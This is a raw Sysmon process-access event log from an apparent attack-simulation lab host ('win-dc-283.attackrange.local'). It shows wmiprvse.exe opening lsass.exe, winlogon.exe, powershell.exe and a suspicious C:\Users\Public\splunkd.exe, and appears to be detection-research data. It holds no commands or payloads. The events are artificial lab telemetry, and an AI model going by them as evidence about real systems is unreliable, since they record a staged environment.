16:01:40.378{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029280Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.378{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029279Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.378{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029278Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.378{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029277Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.378{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029276Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.378{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029275Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.378{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029274Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.378{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029273Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.378{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029272Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.378{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029271Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.378{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029270Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.378{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029269Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.378{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029268Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.378{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029267Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.378{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029266Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.378{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029265Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.378{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029264Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.378{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029263Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.284{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-53E3-6008-AA06-00000000A301}7064C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029262Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.284{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-53E3-6008-A906-00000000A301}3704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029261Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 